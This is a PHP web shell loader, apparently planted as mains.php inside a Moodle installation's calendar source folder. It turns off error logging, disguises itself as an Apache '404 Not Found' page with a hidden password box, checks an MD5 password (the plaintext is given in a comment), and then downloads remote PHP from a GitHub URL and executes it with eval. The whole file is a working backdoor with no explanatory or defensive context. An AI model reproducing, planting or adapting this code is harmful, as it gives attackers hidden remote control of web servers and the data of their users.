Current Path : C:/xampp/htdocs/moodle/calendar/amd/src/ |
Current File : C:/xampp/htdocs/moodle/calendar/amd/src/mains.php |
<?php session_start(); @set_time_limit(0); @clearstatcache(); @ini_set('error_log', NULL); @ini_set('log_errors', 0); @ini_set('max_execution_time', 0); @ini_set('output_buffering', 0); @ini_set('display_errors', 0); /* Configuration */ /* Password using md5 hashes */ $password = "52eb04c6c446017ea2b4a1b2c2351f9d"; //mrmad $default_action = "FilesMan"; $default_use_ajax = true; $default_charset = 'UTF-8'; date_default_timezone_set("Asia/Jakarta"); function login_shell() { ?> <!DOCTYPE html> <html lang="en"> <head> <title>404 Not Found</title> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <?php echo '<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>'; ?> <style> input { margin: 0; background-color: #fff; border: 1px solid #fff; text-align: center; } </style> </head> <body> <form action="" method="post"> <div align="center"> <br><br><br><br><br><br><br><br><br><br><br><br><br><br> <input type="password" name="pass"> <input type="submit" name="submit" value=""> </div> </form> </body> </html> <?php exit; } if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) { if (isset($_POST['pass']) && (md5($_POST['pass']) == $password)) { $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; } else { login_shell(); } } eval("?>".file_get_contents("https://raw.githubusercontent.com/yon3zu/403WebShell/main/403WebShell.php")); ?>